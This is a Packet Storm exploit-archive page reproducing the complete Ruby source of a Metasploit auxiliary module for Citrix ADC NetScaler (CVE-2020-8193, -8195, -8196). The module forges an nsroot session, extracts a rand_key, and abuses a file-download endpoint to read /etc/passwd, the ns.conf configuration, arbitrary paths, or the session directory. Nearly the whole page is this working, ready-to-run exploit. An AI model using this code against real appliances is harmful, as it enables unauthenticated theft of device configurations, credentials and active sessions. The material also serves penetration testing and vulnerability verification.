what you don't know can hurt you

Citrix ADC NetScaler Local File Inclusion

Citrix ADC NetScaler Local File Inclusion
Posted Nov 13, 2020
Authored by Donny Maasland, Ramella Sebastien | Site metasploit.com

This Metasploit module exploits a local file inclusion vulnerability in Citrix ADC Netscaler.

tags | exploit, local, file inclusion
advisories | CVE-2020-8193, CVE-2020-8195, CVE-2020-8196
MD5 | d988d9b9c395233084520c1b63a93177

Citrix ADC NetScaler Local File Inclusion

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',
'Description' => %{
The remote device is affected by multiple vulnerabilities.

An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.
An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit
this to bypass authorization (CVE-2020-8193).

And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.
},
'Author' => [
'Donny Maasland', # Discovery
'mekhalleh (RAMELLA S├ębastien)' # Module author (Zeop Entreprise)
],
'References' => [
['CVE', '2020-8193'],
['CVE', '2020-8195'],
['CVE', '2020-8196'],
['URL', 'https://dmaasland.github.io/posts/citrix.html'],
['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],
['URL', 'https://github.com/jas502n/CVE-2020-8193']
],
'DisclosureDate' => '2020-07-09',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
}
))

register_options([
OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),
OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def create_session
params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'

request = {
'method' => 'POST',
'uri' => "#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}",
'ctype' => 'application/xml',
'headers' => {
'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)
},
'data' => '<appfwprofile><login></login></appfwprofile>'
}
request = request.merge({'cookie' => @cookie}) if @cookie

response = send_request_raw(request)
unless response && response.code == 406
print_error("#{@message_prefix} - No response to session request.")
return
end

response.get_cookies
end

def fix_session_rand
response = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),
'cookie' => @cookie,
'vars_get' => {
'sid' => 'nsroot',
'username' => 'nsroot',
'force_setup' => '1'
}
)

if response && response.code == 302
location = response.headers['location']

response = send_request_cgi(
'method' => 'GET',
'uri' => location,
'cookie' => @cookie
)

return unless response && response.code == 200
end

response.to_s.scan(/rand = "([^"]+)"/).join
end

def read_lfi(path, var_rand)
params = "filter=path:#{path}"

request = {
'method' => 'POST',
'uri' => "#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}",
'cookie' => @cookie,
'ctype' => 'application/xml',
'headers' => {
'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),
'rand_key' => var_rand
},
'data' => '<clipermission></clipermission>'
}

response = send_request_raw(request)
end

def run_host(ip)
proto = (datastore['SSL'] ? 'https' : 'http')
@message_prefix = "#{proto}://#{ip}:#{datastore['RPORT']}"

@cookie = create_session
if @cookie && @cookie =~ /SESSID/
print_status("#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}")

var_rand = fix_session_rand
unless var_rand
print_error("#{@message_prefix} - Unable to get rand value.")
return Exploit::CheckCode::Unknown
end
print_status("#{@message_prefix} - Got rand: #{var_rand}")

print_status("#{@message_prefix} - Re-breaking session...")
create_session

case datastore['MODE']
when /discovery/
response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)
if response.code == 406
if response.body.include? ('root:*:0:0:')
print_warning("#{@message_prefix} - Vulnerable.")

return Exploit::CheckCode::Vulnerable
end
end
when /interactive/
# TODO: parse response
response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)
if response.code == 406
print_line("#{response.body}")
end

return
when /sessions/
# TODO: parse response
response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)
if response.code == 406
print_line("#{response.body}")
end

return
end
end
print_good("#{@message_prefix} - Not Vulnerable.")

return Exploit::CheckCode::Safe
end

end
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close